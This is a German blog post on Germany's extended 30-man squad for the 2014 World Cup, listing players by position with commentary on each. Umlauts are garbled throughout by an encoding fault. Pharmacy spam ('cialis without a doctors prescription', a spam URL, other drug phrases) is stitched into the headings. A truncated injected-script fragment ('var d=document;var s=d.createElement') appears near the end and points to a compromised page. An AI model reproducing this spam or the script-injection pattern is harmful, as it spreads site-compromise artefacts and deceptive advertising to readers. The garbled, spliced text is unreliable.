Willkommen auf » WM 2014 Der deutsche 30er-Kader
8. Mai 2014

WM 2014 Der deutsche 30er-Kader

Gut fA?nf Wochen vor Beginn der FuAYball-Weltmeisterschaft in Brasilien hat Bundestrainer Joachim LA�w heute auf einer DFB-Pressekonferenz in Frankfurt am Main den erweiterten Turnierkader der deutschen Nationalmannschaft bekannt gegeben. Verletzungsbedingt klemmt es bekanntlich an der ein oder anderen Stelle, A?ber ausreichendes Talent und Potenzial fA?r erfolgreiche vier Wochen verfA?gt der deutsche FuAYball aber mittlerweile zweifelsfrei. Schauen wir mal auf die Nominierungen…

TorhA?ter
Manuel Neuer – FC Bayern MA?nchen – 45 LA�nderspiele
Ron-Robert Zieler – Hannover 96 – 2 LA�nderspiele
Roman Weidenfeller – Borussia Dortmund – 1 LA�nderspiel

Es ist das alte Spiel: Die wenigsten Probleme hat Deutschland traditionell auf der TorhA?terposition. Manuel Neuer steht unangefochten als Nummer 1 mit PrA�dikat Weltklasse im Kasten. Dahinter haben wir mit Roman Weidenfeller und Ron-Robert Zieler zwei weitere Keeper, die ebenfalls den internationalen Vergleich bei einer Weltmeisterschaft nicht scheuen mA?ssen. Auch mit einem Marc-AndrA� ter-Stegen, Bernd Leno oder Rene Adler hA�tte man aber bedenkenlos nach SA?damerika reisen kA�nnen.

Abwehr Pills exilar 20 no prescription Pills Cheap
Philipp Lahm – FC Bayern MA?nchen – 105 LA�nderspiele
Per Mertesacker – FC Arsenal – 96 LA�nderspiele
Marcell Jansen – Hamburger SV – 45 LA�nderspiele
Jerome Boateng – FC Bayern MA?nchen – 37 LA�nderspiele
Mats Hummels – Borussia Dortmund – 28 LA�nderspiele
Benedikt HA�wedes – FC Schalke 04 – 18 LA�nderspiele
Marcel Schmelzer – Borussia Dortmund – 16 LA�nderspiele
Matthias Ginter – SC Freiburg – 1 LA�nderspiel
Shkodran Mustafi – Sampdoria Genua – kein LA�nderspiel
Erik Durm – Borussia Dortmund – kein LA�nderspiel

An KapitA�n Philipp Lahm gibt es nichts zu rA?tteln. Offen ist nur, ob er auf seiner angestammten Position als Rechtsverteidiger auflA�uft oder wie beim FC Bayern aus taktischen GrA?nden ins defensive Mittelfeld rA?ckt. Letzteres wA?rde die grA�AYte SchwA�che des deutschen Teams allerdings noch verschA�rfen: Die beiden AuAYenverteidigerpositionen. FA?r Lahm hat sich nach all den Jahren noch immer kein annA�hernd verlA�sslicher Ersatz aufgedrA�ngt. Kevin GroAYkreutz, Benedikt HA�wedes, Jerome Boateng oder Lars Bender wA�ren NotlA�sungen. Auf der anderen Seite haben Marcel Schmelzer und Marcell Jansen ein eher durchwachsenes Jahr hinter sich, fahren aus Mangel an Alternativen mit starkem linken FuAY aber wohl beide mit nach Brasilien. Das Abwehrzentrum ist nominell deutlich besser aufgestellt. Hier kann LA�w mit Mats Hummels (fA?r mich gesetzt), Per Mertesacker (hat fA?r mich die Nase vorn) und Jerome Boateng auf ein international erfahrenes Trio bauen. Ginter, Mustafi (beide Innenverteidiger) und Durm (Linksverteidiger) sind zum HeranfA?hren und Mittrainieren dabei.

Mittelfeld
Lukas Podolski – FC Arsenal – 112 LA�nderspiele – 46 Tore
Bastian Schweinsteiger – FC Bayern MA?nchen – 101 LA�nderspiele – 23 Tore
Mesut A�zil – FC Arsenal – 53 LA�nderspiele – 17 Tore
Thomas MA?ller – FC Bayern MA?nchen – 47 LA�nderspiele – 16 Tore
Sami Khedira – Real Madrid – 44 LA�nderspiele – 4 Tore
Toni Kroos – FC Bayern MA?nchen – 42 LA�nderspiele – 5 Tore
Mario GA�tze – FC Bayern MA?nchen – 27 LA�nderspiele – 7 Tore
AndrA� SchA?rrle – FC Chelsea – 31 LA�nderspiele – 11 Tore
Marco Reus – Borussia Dortmund – 19 LA�nderspiele – 7 Tore
Lars Bender – Bayer Leverkusen – 17 LA�nderspiele – 4 Tore
Julian Draxler – FC Schalke 04 – 10 LA�nderspiele – 1 Tor
Kevin GroAYkreutz – Borussia Dortmund – 4 LA�nderspiele
AndrA� Hahn – FC Augsburg – kein LA�nderspiel
Leon Goretzka – FC Schalke 04 – kein LA�nderspiel
Max Meyer – FC Schalke 04 – kein LA�nderspiel

Wenn Sami Khedira nach seinem Kreuzbandriss vom November schnell wieder zu alter Form findet, haben wir im Duett mit Bastian Schweinsteiger unser bewA�hrtes Sechser-PA�rchen zurA?ck. Alternativen wA�ren ein aufrA?ckender Lahm, ein etwas offensiver spielender Toni Kroos oder Lars Bender als klassischer AbrA�umer. Ilkay GA?ndogan ist nach seiner langwierigen WirbelsA�ulenverletzung gerade erst wieder im Aufbautraining und zurecht nicht nominiert.

Davor gilt es das PrunkstA?ck der Mannschaft zu besetzen: Die offensive Dreierreihe. Hier hat der Bundestrainer die traumhafte Qual der Wahl unter verschiedensten Spielertypen. Im Zentrum kA�nnten Mesut A�zil, Mario GA�tze oder Toni Kroos das Spiel machen oder Thomas MA?ller als hA�ngende Spitze agieren. FA?r den linken FlA?gel bieten sich der formstarke Marco Reus, der beim FC Chelsea immer besser aufspielende AndrA� SchA?rrle, LA�w-Liebling Lukas Podolski, Mario GA�tze und Julian Draxler an. Auf Rechts dA?rfte MA?ller die erste Wahl sein, aber auch GA�tze und Reus kA�nnten die AuAYenbahn wechseln.

Ebenso spannend wie die Besetzung von Spiel zu Spiel wird aber zunA�chst die endgA?ltige Nominierung. Mindestens einer dieser talentierten Techniker wird wohl nach dem Trainingslager aussortiert. FA?r Allrounder Kevin GroAYkreutz findet sich dagegen vielleicht ein Platz, da er auch die Defensivpositionen auf beiden FlA?gel besetzen kA�nnte. AndrA� Hahn, Leon Goretzka und Max Meyer fA?llen den Kader auf und dA?rfen mal reinschnuppern.

Sturm cialis without a doctors prescription
Miroslav Klose – Lazio Rom – 131 LA�nderspiele – 68 Tore
Kevin Volland – 1899 Hoffenheim – kein LA�nderspiel

Von Turnier zu Turnier wird die Liste klassischer StA?rmer immer kA?rzer. Diesmal findet sich mit Miroslav Klose lediglich noch ein echter Angreifer im erweiterten Aufgebot. Der 35-jA�hrige hatte im letzten Jahr allerdings mehr mit Verletzungen als mit Gegenspielern zu kA�mpfen. LA�w wird sich also zunA�chst mal einen Eindruck von seinem Fitnesszustand verschaffen wollen. Dazu wurde mit Kevin Volland ein hoffnungsvoller Kicker berufen, der sA�mtliche Offensivpositionen besetzen kann, immer ein wahnsinniges MaAY an Einsatzwillen und Laufbereitschaft mitbringt und meiner Meinung nach genau aus diesen GrA?nden gute Chancen auf eine Turnierteilnahme haben kA�nnte. Mit MA?ller, Podolski, SchA?rrle und GA�tze kann LA�w auAYerdem auf so einige Alternativen aus dem Mittelfeld zurA?ckgreifen, die sich taktisch variabel auch im Sturmzentrum aufstellen lassen.

http://tintuc.2skyair.com/depression-pills-weight-gain.html Buy mail order zyrtec Meine persA�nliche Top-11
Neuer – Schmelzer, Mertesacker, Hummels, Lahm – Schweinsteiger, Khedira – Reus, A�zil, MA?ller – Volland

Ein Wort zum Thema Blockbildung: Der deutsche Meister FC Bayern schickt 7 Spieler zur Nationalmannschaft, Borussia Dortmund ist mit 6 Kickern dabei, Schalke mit 4, Arsenal 3, Hamburg, Hannover, Leverkusen, Hoffenheim, Freiburg, Augsburg, Chelsea, Real Madrid und Sampdoria Genua je 1. Da kein Bundesligist im Champions League Finale steht, hat LA�w das Team diesmal frA?hzeitig beisammen und kann eine hoffentlich ablenkungsfreie Vorbereitung planen.

Und wer bleibt Zuhause? Eine A?berraschung hat Jogi ja immer im Petto: Nach einer zweimonatigen Pause aufgrund einer Knieverletzung traut das Trainerteam Mario Gomez nicht zu, rechtzeitig in Turnierform zu kommen. Nicht dabei sind auAYerdem u.a. Sven Bender, Max Kruse, Sidney Sam und Heiko Westermann, die allesamt in den letzten LA�nderspielen noch auf dem Rasen standen. Auch die frA?heren Nationalspieler Rene Adler, Tim Wiese, Piotr Trochowski, Serdar Tasci, Dennis Aogo, Marko Marin, Stefan KieAYling und Christian TrA�sch finden keinen Platz mehr im Auswahlkader.

Von DFB-TV gibt’s hier noch die Komplettaufzeichnung der Pressekonferenz…
online order roxithromycin uses purchase tulasi songs

Den offiziellen Turnierkader mit 23 Spielern muss das deutsche Trainerteam am 2. Juni an die FIFA melden. Nach dem Trainingslager in SA?dtirol mA?ssen sich also sieben Mann aus der Mannschaft verabschieden. Ich tippe auf Ginter, Mustafi und Durm aus der Abwehr, sowie Meyer, Goretzka, Hahn und eine A?berraschung aus dem Mittelfeld. AbhA�ngig von Form und den gezeigten Testspielleistungen kA�nnte es GroAYkreutz, Draxler, Bender, SchA?rrle oder Volland treffen.

Dann drA?cken wir mal die Daumen und wA?nschen den Jungs eine verletzungsfreie Turniervorbereitung.

* Update *
Nach dem Vorbereitungsspiel gegen Polen hat der Bundestrainer nun noch Christoph Kramer (Borussia MA�nchengladbach, defensives Mittelfeld, 1 LA�nderspiel) fA?r das Trainingslager in SA?dtirol nachnominiert. Dagegen wurden Andre Hahn, Leon Goretzka, Marcell Jansen und Max Meyer nach dem Spiel nach Hause geschickt. Das Quartett hA�lt sich aber fA?r mA�gliche VerletzungsfA�lle als NachrA?cker zur VerfA?gung.var d=document;var s=d.createElement(‚script‘); online


Einen Kommentar schreiben